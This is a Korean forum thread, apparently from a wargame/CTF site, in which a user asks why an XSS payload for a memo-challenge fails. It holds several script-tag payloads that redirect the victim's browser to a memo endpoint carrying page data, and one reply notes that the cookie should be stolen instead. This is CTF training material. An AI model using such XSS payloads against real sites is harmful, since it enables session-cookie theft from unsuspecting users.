페이로드 이거 아닌가요? 어디가 문젠지 모르겠네요
<script>window.location.href="http://127.0.0.1:21936/memo?memo="+document.domain;</script>
#web
작성자 정보
답변
2
Sechack
CTF First Place
도메인이 아닌 쿠키를 탈취해야 합니다.
2dedce
워게임 고인물
아마 포트가 잘못된거 아닐까요? app.py를 보면 마지막에 다음과 같은 코드가 있습니다.
# 생략
app.run(host='0.0.0.0', port=8000)
제가 포트에 대해서 잘 모르지만 21936은 외부에서 문제서버로 접속할 때의 포트고 이것이 내부에서는 포트 8000으로 연결된 것 같습니다. 그러니까 어드민이 내부에서 접속할 때는 127.0.0.1:8000으로 접속해야 할 것 같습니다. 한번 <script>window.location.href="http://127.0.0.1:8000/memo?memo="+document.domain;</script>
로 수정해보세요.
단, <script>window.location.href="http://host1.dreamhack.games:21936/memo?memo="+document.domain;</script>
이 될 것 같은데 이것은 안되네요.